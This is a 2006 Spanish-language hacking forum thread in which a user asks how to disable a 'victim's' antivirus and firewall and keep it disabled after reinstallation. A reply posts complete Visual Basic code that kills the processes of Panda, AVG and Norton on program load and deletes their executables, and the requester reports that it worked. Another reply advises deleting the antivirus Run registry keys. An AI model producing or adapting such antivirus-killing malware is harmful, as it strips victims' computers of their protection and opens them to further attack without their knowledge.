Título: Matar Firewall con un programa o con un simple bat
Publicado por: love_magic en 10 Abril 2006, 19:14 pm
Hola amigos primero agradecerles por todo lo que hacen aqui esta web esta chingona.............. la pregunta es si existe algun programa, bat o codigo para crear en VB un programa que sea capas de eliminar el firewall de los antivirus y que este en el registro de windows. para que cuando la victima vuelva a instalar un antivirus el registro el programa o bat pueda actuar .......... muchas gracias de antemano
javito***17
Título: Re: Matar Firewall con un programa o con un simple bat
Publicado por: ..::[ thekingkid ]::.. en 10 Abril 2006, 19:32 pm
no es inchame un huevo ya ya
un firewall seria como matar cualquier proceso... pero no se si se pueda matar yo intentaria con esto.:
eliminaria las claves del registro que hacen que el antivirus inicie el el sistema en hklm\sowftare\microsoft\winbdows\run\ y borraria las claves que hacen que inicie y ya.. eso tendria que hacer que se reinicie el computador
pero puedes probar matando los procesos tambiien puedes analizarlos primero con cualquier programa mata procesos ya ya intenta con este mx.geocities.com/kaiserkalamar/zip\procexp.zip (http://mx.geocities.com/kaiserkalamar/zip\procexp.zip)
Título: Re: Matar Firewall con un programa o con un simple bat
Publicado por: love_magic en 10 Abril 2006, 20:15 pm
Yo digo simplemete que eliminemos totalmente al antivirus ok si eliminamos en el registro ese que me diste esta obsoleto ya que los antivirus cuidan mucho los registro de windows lo que me referia a lo de registro de windows les decia como winstar.bat que nunca lo prove, tambien una inyeccion
o uno de activexx
solo les pregunte si alguno de ustedes ha creado un programa Javito***
Título: Re: Matar Firewall con un programa o con un simple bat
Publicado por: love_magic en 10 Abril 2006, 20:17 pm
ojo que soy nuevo en el foro ok por eso los andaba preguntando ok salu2 Javito***
Título: Re: Matar Firewall con un programa o con un simple bat
Publicado por: satanico88 en 11 Abril 2006, 13:14 pm
weno.. javito.. lo q yo haria seria en primer lugar.. matar el proceso de el anti-virus... te dejare el codigo mas abajo.. una ves matado el proceso tiene q borrar el directorio del antivirus.. Codigo : PON ESTO EN UN MODULO Option Explicit Private Declare Function CloseHandle Lib "Kernel32.dll" (ByVal Handle As Long) As Long Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Function GetVersionExA Lib "kernel32" (lpVersionInformation As OSVERSIONINFO) As Integer Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * 260 End Type Private Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 End Type Private Const PROCESS_ALL_ACCESS = 0 Private Const TH32CS_SNAPPROCESS As Long = 2& Private Const WINNT As Integer = 2 Private Const WIN98 As Integer = 1 Public KillAppReturn As Boolean Public Function getVersion() As Integer Dim udtOSInfo As OSVERSIONINFO Dim intRetVal As Integer With udtOSInfo .dwOSVersionInfoSize = 148 .szCSDVersion = Space$(128) End With
intRetVal = GetVersionExA(udtOSInfo)
getVersion = udtOSInfo.dwPlatformId End Function
Public Function Killapp(myName As String) Select Case getVersion() Case WIN98 Killapp9X (myName) Case WINNT KillappNT (myName) End Select End Function
Private Function KillappNT(myName As String) Dim uProcess As PROCESSENTRY32 Dim rProcessFound As Long Dim hSnapshot As Long Dim szExename As String Dim exitCode As Long Dim myProcess As Long Dim AppKill As Boolean Dim appCount As Integer Dim I As Integer On Local Error GoTo Finish appCount = 0 uProcess.dwSize = Len(uProcess) hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&) rProcessFound = ProcessFirst(hSnapshot, uProcess) Do While rProcessFound I = InStr(1, uProcess.szExeFile, Chr(0)) szExename = LCase$(Left$(uProcess.szExeFile, I - 1)) If Right$(szExename, Len(myName)) = LCase$(myName) Then KillAppReturn = True appCount = appCount + 1 myProcess = OpenProcess(1&, -1&, uProcess.th32ProcessID) AppKill = TerminateProcess(myProcess, 0&) Call CloseHandle(myProcess) End If rProcessFound = ProcessNext(hSnapshot, uProcess) Loop Call CloseHandle(hSnapshot) Finish: KillAppReturn = False End Function
Private Function Killapp9X(myName As String) Dim uProcess As PROCESSENTRY32 Dim rProcessFound As Long Dim hSnapshot As Long Dim szExename As String Dim exitCode As Long Dim myProcess As Long Dim AppKill As Boolean Dim appCount As Integer Dim I As Integer On Local Error GoTo Finish appCount = 0 uProcess.dwSize = Len(uProcess) hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&) rProcessFound = ProcessFirst(hSnapshot, uProcess) Do While rProcessFound I = InStr(1, uProcess.szExeFile, Chr(0)) szExename = LCase$(Left$(uProcess.szExeFile, I - 1)) If Right$(szExename, Len(myName)) = LCase$(myName) Then KillAppReturn = True appCount = appCount + 1 myProcess = OpenProcess(PROCESS_ALL_ACCESS, False, uProcess.th32ProcessID) AppKill = TerminateProcess(myProcess, exitCode) Call CloseHandle(myProcess) End If rProcessFound = ProcessNext(hSnapshot, uProcess) Loop Call CloseHandle(hSnapshot) Finish: KillAppReturn = False End Function
Y ESTO EN EL FORM Private Sub Form_Load() Killapp "panda.exe" Killapp "avg.exe" Killapp "norton.exe" '( pon los procesos de todos los antivirus q conoscas... ) '( aki pon la ruta del exe del antivirus para q sea borrado ) Kill ("C:\archivos de programa\Panda\panda.exe") Kill ("C:\archivos de programa\AVG\avg.exe") Kill ("C:\archivos de programa\Norton 200\norton.exe")
eso es todo fijate si te funciona y me avisas !
Título: Re: Matar Firewall con un programa o con un simple bat
Publicado por: love_magic en 11 Abril 2006, 15:00 pm
Gracias man eso si que funciono de maravilla solo que te preguntaria ahora que ya le elimine el antivirus, se encontrara que su antivus a sido eliminado pero lo volvera a instalar sera que actue... de nuevo salu2 javito
|